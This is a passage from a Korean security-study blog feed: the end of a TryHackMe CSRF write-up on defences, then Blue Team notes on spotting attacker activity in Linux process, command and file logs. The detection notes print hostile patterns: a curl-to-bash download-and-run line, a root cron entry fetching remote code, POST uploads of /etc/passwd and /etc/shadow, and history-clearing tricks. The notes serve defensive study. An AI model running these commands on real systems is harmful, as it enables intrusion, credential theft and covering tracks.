&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;rarr; `&lt;b&gt;Referer&lt;/b&gt;`만으로는 CSRF 방어 불충분&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;[7]&amp;nbsp; Defence Mechanisms&lt;/b&gt;&lt;/h3&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;b&gt;[7-1] Pentesters / Red Teamers &lt;/b&gt;&lt;/h4&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;- CSRF Testing&lt;/b&gt; = 비인가 요청을 실제로 실행 &amp;rarr; CSRF 취약점 존재 확인&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;- Boundary Validation&lt;/b&gt; = 입력값 검증 및 CSRF 토큰 존재/검증 여부 확인&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;- Security Headers Analysis&lt;/b&gt; = CORS, Refere 등 보안 Header 설정 점검&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;- Session Management Testing&lt;/b&gt; = 세션 토큰이 안전하게 생성/전송/검증 되는지 확인&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;- CSRF Exploitation Scenarios&lt;/b&gt; = 이미지 태그, 숨겨진 요청 등 다양한 공격 시나리오 테스트&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;b&gt;[7-2] Secure Coders&lt;/b&gt;&lt;/h4&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;- Anti-CSRF Tokens&lt;/b&gt; = 예측 불가능한 토큰 적용&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;- SameSite Cookie Attribute&lt;/b&gt; = `Strict` 또는 `Lax`로 설정하여 cookie 전송 제한&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;- Referrer Policy&lt;/b&gt; = Referer 정보 제한 및 신뢰된 요청만 허용하게끔 설정&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;- Content Security Policy (CSP)&lt;/b&gt; = 신뢰된 스크립트만 실행되도록 설정&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;- Double Submit Cookie Pattern&lt;/b&gt; = cookie와 요청 파라미터 토큰 비교로 검증&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;- CAPTCHA 적용&lt;/b&gt; = 자동 공격 방지&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;[TryHackMe] CSRF. &lt;span style=&quot;color: #ee2323;&quot;&gt;Finish!&lt;/span&gt; &lt;/b&gt;&lt;/p&gt;</description>
      <category>TryHackMe/Web Hacking</category>
      <category>cross-site request forgery</category>
      <category>CSRF</category>
      <category>Cyber Security</category>
      <category>TryHackMe</category>
      <category>web hacking</category>
      <category>write-up</category>
      <category>모의해킹</category>
      <category>정보보안</category>
      <category>해킹 스터디</category>
      <author>AnbyMata</author>
      <guid isPermaLink="true">https://anbymata.tistory.com/73</guid>
      <comments>https://anbymata.tistory.com/73#entry73comment</comments>
      <pubDate>Tue, 5 May 2026 23:46:32 +0900</pubDate>
    </item>
    <item>
      <title>[Blue Team] EP.10 - 프로세스 / 명령 / 파일 / 네트워크 분석</title>
      <link>https://anbymata.tistory.com/72</link>
      <description>&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;[10-1] 프로세서와 명령 로그의 정보&lt;/b&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;프로세스와 명령 로그 = 공격자의 실제 행위 흔적&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;b&gt;실행 파일 경로 :&lt;/b&gt; 정상 (`&lt;span style=&quot;color: #5733b1;&quot;&gt;/usr/bin`&lt;/span&gt;), 의심 (`&lt;span style=&quot;color: #5733b1;&quot;&gt;/tmp`&lt;/span&gt;, `&lt;span style=&quot;color: #5733b1;&quot;&gt;/dev/shm`&lt;/span&gt;)&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;b&gt;명령 인자 :&lt;/b&gt; 실행한 옵션 및 대상 (파일 다운로드, 특정 IP 접속...)&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;b&gt;부모-자식 관계 (PPID) :&lt;/b&gt; 프로세스를 실행한 근원 추적 = 공격 흐름 추적&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;b&gt;UID / EUID :&lt;/b&gt; 실행한 권한 파악 = 권한 상승 여부 확인&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;b&gt;각 공격 단계의 명령어들&lt;/b&gt;&lt;/h4&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;1. Reconnaissance (정찰)&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- `&lt;span style=&quot;color: #781b33;&quot;&gt;id`&lt;/span&gt;&lt;span style=&quot;color: #781b33;&quot;&gt;, `&lt;/span&gt;&lt;span style=&quot;color: #781b33;&quot;&gt;&lt;b&gt;whoami`&lt;/b&gt;&lt;/span&gt;, `&lt;span style=&quot;color: #781b33;&quot;&gt;&lt;b&gt;uname -a&lt;/b&gt;&lt;/span&gt;`, `&lt;b&gt;&lt;span style=&quot;color: #781b33;&quot;&gt;ps&lt;/span&gt;&lt;/b&gt;`, `&lt;b&gt;&lt;span style=&quot;color: #781b33;&quot;&gt;netstat&lt;/span&gt;&lt;/b&gt;`&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&amp;rarr; 시스템/네트워크 정보 수집&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;2. Execution (실행)&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- &lt;span style=&quot;color: #781b33;&quot;&gt;&lt;b&gt;`bash`, `sh`, `python3`, `perl`&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&amp;rarr; 악성 코드 실행&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;3. Download (도구 확보)&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- &lt;span style=&quot;color: #781b33;&quot;&gt;&lt;b&gt;`curl`, `wget`, `scp`, `sftp`&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&amp;rarr; 외부에서 파일 가져오기&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;4. Persistence (지속성 확보)&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- &lt;span style=&quot;color: #781b33;&quot;&gt;&lt;b&gt;`crontab`, `systemctl enable`, `useradd`&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&amp;rarr; 재부팅 후에도 유지&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;5. Exfiltration (정보 유출)&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- &lt;span style=&quot;color: #781b33;&quot;&gt;&lt;b&gt;`scp`, `rsync`, `curl -F`, `nc`&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&amp;rarr; 데이터 외부로 전송&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;[10-2] bash_history 한계점&lt;/b&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;bash_history&lt;/b&gt; = 사용자가 터미널에서 입력한 명령어 기록 파일&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;우회 방법&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;- 비대화형 shell&lt;/b&gt; (ex. 스크립트 실행) &amp;rarr; 기록 안 남음&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;- 환경변수 조작&lt;/b&gt; (&lt;b&gt;`HISFILE=unset`&lt;/b&gt;) &amp;rarr; 기록 비활성화&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;- 기록 타이밍&lt;/b&gt; &amp;rarr; 세션 종료 시점에 저장 (실시간이 아님)&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;- 우회 실행 (&lt;span style=&quot;color: #781b33;&quot;&gt;`sh script.sh`&lt;/span&gt;)&lt;/b&gt; &amp;rarr; 기록이 안 남을 수 있음&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;- 삭제&lt;/b&gt; &amp;rarr; `&lt;span style=&quot;color: #5733b1;&quot;&gt;history -c&lt;/span&gt;`, `&lt;span style=&quot;color: #5733b1;&quot;&gt;.bash_history&lt;/span&gt;` 파일 삭제&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;보강 방법&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;- auditd (execve) :&lt;/b&gt; 커널 레벨 명령 실행 기록 &amp;rarr; 삭제/조작 어려움&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;- EDR Telemetry :&lt;/b&gt; 부모-자식 프로세스 + 전체 커맨드 라인&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;- sudo 로그 :&lt;/b&gt; 권한 상승 흔적 (&lt;span style=&quot;color: #5733b1;&quot;&gt;auth.log&lt;/span&gt;)&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;- 서비스 로그 (journald, nginx, cron) :&lt;/b&gt; 서비스/시스템 단위 행위 확인&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;[10-3] 외부 파일 이동 흔적&lt;/b&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;`&lt;span style=&quot;color: #781b33;&quot;&gt;&lt;b&gt;curl&lt;/b&gt;&lt;/span&gt;` / `&lt;span style=&quot;color: #781b33;&quot;&gt;&lt;b&gt;wget&lt;/b&gt;&lt;/span&gt;` = 파일 다운로드 / HTTP 통신&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;`&lt;span style=&quot;color: #781b33;&quot;&gt;&lt;b&gt;scp&lt;/b&gt;&lt;/span&gt;` / `&lt;span style=&quot;color: #781b33;&quot;&gt;&lt;b&gt;sftp&lt;/b&gt;&lt;/span&gt;` = 원격 서버와 파일 전송&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;b&gt;위험 패턴&lt;/b&gt;&lt;/h4&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- `&lt;b&gt;&lt;span style=&quot;color: #781b33;&quot;&gt;curl http://&lt;span style=&quot;color: #333333;&quot;&gt;[외부IP]&lt;/span&gt;/a.sh | bash&lt;/span&gt;&lt;/b&gt;`&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;rarr; 외부 IP에서 스크립트 다운 후 즉시 실행&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- `&lt;span style=&quot;color: #5733b1;&quot;&gt;&lt;b&gt;/tmp&lt;/b&gt;&lt;/span&gt;`, `&lt;span style=&quot;color: #5733b1;&quot;&gt;&lt;b&gt;/dev/shm&lt;/b&gt;&lt;/span&gt;`, `&lt;span style=&quot;color: #5733b1;&quot;&gt;&lt;b&gt;/var/tmp&lt;/b&gt;&lt;/span&gt;` 등의 비정상 경로 저장&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&amp;rarr;&lt;span&gt; 임시 및 은닉의 목적&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;- `&lt;b&gt;&lt;span style=&quot;color: #5733b1;&quot;&gt;/etc/passwd&lt;/span&gt;&lt;/b&gt;`, `&lt;span style=&quot;color: #5733b1;&quot;&gt;&lt;b&gt;/etc/shadow&lt;/b&gt;&lt;/span&gt;` 등을 &lt;b&gt;POST&lt;/b&gt; 요청으로 업로드&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&amp;rarr;&lt;span&gt; 민감 정보 외부 전송&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;- `&lt;span style=&quot;color: #781b33;&quot;&gt;&lt;b&gt;scp &lt;span style=&quot;color: #333333;&quot;&gt;user@IP:path&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;`&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&amp;rarr; 원격 서버로 파일 전송 &lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&amp;rarr;&lt;span&gt; 데이터 유출 가능성&lt;/span&gt;&lt;/span&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;[10-4] 즉시 실행 &amp;amp; 은닉 실행 패턴&lt;/b&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;1. `&lt;span style=&quot;color: #781b33;&quot;&gt;curl&lt;/span&gt;`&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 외부에서 &lt;b&gt;데이터/파일 다운로드&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- HTTP 요청 가능 &amp;rarr; 유출에도 사용&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;2. `&lt;span style=&quot;color: #781b33;&quot;&gt;chmod +x&lt;/span&gt;`&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 파일에 &lt;b&gt;실행 권한 부여&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 다운로드 파일을 즉시 실행 가능 상태로 변경&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;3. `&lt;span style=&quot;color: #781b33;&quot;&gt;sh -c&lt;/span&gt;` / `&lt;span style=&quot;color: #781b33;&quot;&gt;bash -c&lt;/span&gt;`&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 문자열을 명령으로 직접 &lt;b&gt;실행&lt;/b&gt;&lt;br /&gt;&amp;nbsp;- 파일 없이 코드 실행 가능&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;4. `&lt;span style=&quot;color: #781b33;&quot;&gt;nohup &amp;amp;&lt;/span&gt;`&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- &lt;b&gt;백그라운드 실행&lt;/b&gt;&lt;br /&gt;&amp;nbsp;- 터미널 종료 후에도 계속 실행됨&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;5. `&lt;span style=&quot;color: #781b33;&quot;&gt;/dev/null&lt;/span&gt;`&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 출력/에러를 버림 &amp;rarr; &lt;b&gt;로그 숨기기&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;6. `&lt;span style=&quot;color: #781b33;&quot;&gt;base64 -d`&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 인코딩된 문자열을 디코딩&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 내용을 숨겨 &lt;b&gt;탐지 우회&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;[10-5] 위험 경로 &amp;amp; 숨김 파일&lt;/b&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;`&lt;span style=&quot;color: #5733b1;&quot;&gt;/tmp&lt;/span&gt;`&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 모든 사용자에게 쓰기 기능 주어짐&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 재부팅 시 초기화 &amp;rarr; 임시 실행 / 악성 스크립트 투하 위치&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;span style=&quot;color: #5733b1;&quot;&gt;&lt;b&gt;`/var/tmp`&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- `/tmp`와 유사하지만, 재부팅 시에도 유지됨 &amp;rarr; 지속성 확보용 경로&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;span style=&quot;color: #5733b1;&quot;&gt;&lt;b&gt;`/dev/shm`&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 메모리 기반 파일 시스템&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 디스크에 흔적 거의 없음 &amp;rarr; 포렌식 회피&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;dot file (`&lt;span style=&quot;color: #5733b1;&quot;&gt;.&lt;/span&gt;`으로 시작하는 파일)&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 기본&lt;b&gt; `&lt;span style=&quot;color: #781b33;&quot;&gt;ls&lt;/span&gt;`&lt;/b&gt;에서 안보임 &amp;rarr; 숨겨진 파일 저장&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;b&gt;탐지 명령&lt;/b&gt;&lt;/h4&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;`&lt;span style=&quot;color: #781b33;&quot;&gt;&lt;b&gt;find /tmp /var/tmp /dev/shm -type f -perm&lt;/b&gt;&lt;/span&gt;&lt;span&gt;&lt;span style=&quot;color: #781b33;&quot;&gt;&lt;b&gt; /111&lt;/b&gt;&lt;/span&gt;`&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- `&lt;span style=&quot;color: #5733b1;&quot;&gt;/&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;&lt;span style=&quot;color: #5733b1;&quot;&gt;tmp&lt;/span&gt;`, `&lt;span style=&quot;color: #5733b1;&quot;&gt;/var/tmp&lt;/span&gt;`, `&lt;span style=&quot;color: #5733b1;&quot;&gt;/dev/shm&lt;/span&gt;`에서 &lt;b&gt;실&lt;/b&gt;&lt;/span&gt;&lt;b&gt;행 권한 있는 파일&lt;/b&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; 찾기&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;`&lt;span style=&quot;color: #781b33;&quot;&gt;&lt;b&gt;find /tmp /home -name &quot;.*&quot; -type&lt;/b&gt;&lt;/span&gt;&lt;span&gt;&lt;span style=&quot;color: #781b33;&quot;&gt;&lt;b&gt; f&lt;/b&gt;&lt;/span&gt;`&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;- 이름이 `&lt;b&gt;.&lt;/b&gt;`로 시작하는 &lt;b&gt;숨겨진 파일 찾기&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;span&gt;`&lt;span style=&quot;color: #781b33;&quot;&gt;&lt;b&gt;find&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: #781b33;&quot;&gt;&lt;b&gt; /tmp -mtime -1 &lt;/b&gt;&lt;/span&gt;&lt;span&gt;&lt;span style=&quot;color: #781b33;&quot;&gt;&lt;b&gt;-ls&lt;/b&gt;&lt;/span&gt;`&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;- `&lt;span style=&quot;color: #5733b1;&quot;&gt;/tmp&lt;/span&gt;`에서 최근에 변경된 파일 찾기&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;[10-6] 지속성(Persistence) 확보&lt;/b&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;1. cron (반복 실행)&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 일정 주기로 자동 실행 &amp;rarr; 백도어 계속 유지&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- `&lt;b&gt;&lt;span style=&quot;color: #781b33;&quot;&gt;(root)&lt;/span&gt; &lt;span style=&quot;color: #781b33;&quot;&gt;CMD&lt;/span&gt; &lt;span style=&quot;color: #781b33;&quot;&gt;(curl &lt;span style=&quot;color: #333333;&quot;&gt;[외부_URL]&lt;/span&gt; | bash)&lt;/span&gt;&lt;/b&gt;`&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- &lt;span style=&quot;color: #781b33;&quot;&gt;&lt;b&gt;`(root) CMD (&lt;span style=&quot;color: #333333;&quot;&gt;[/tmp_경로]&lt;/span&gt; &amp;gt;/dev/null 2&amp;gt;&amp;amp;1)`&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;b&gt;2. systemctl (서비스 등록)&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #781b33;&quot;&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;span style=&quot;color: #333333;&quot;&gt;- 서비스로 등록 &amp;rarr; 재부팅 후에도 실행&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #781b33;&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&amp;nbsp;- &lt;b&gt;ExecStart=/tmp/...&lt;/b&gt; 설정&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #781b33;&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&amp;nbsp;- &lt;b&gt;systemctl enable&lt;/b&gt; 설정&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #781b33;&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&amp;nbsp;- &lt;b&gt;Restart=always&lt;/b&gt; 설정&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #781b33;&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;[10-7] 공격 흐름&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #781b33;&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;b&gt;1. auth.log&lt;/b&gt; - 로그인 성공&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #781b33;&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;b&gt;2. sudo.log&lt;/b&gt; - root 권한 획득&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
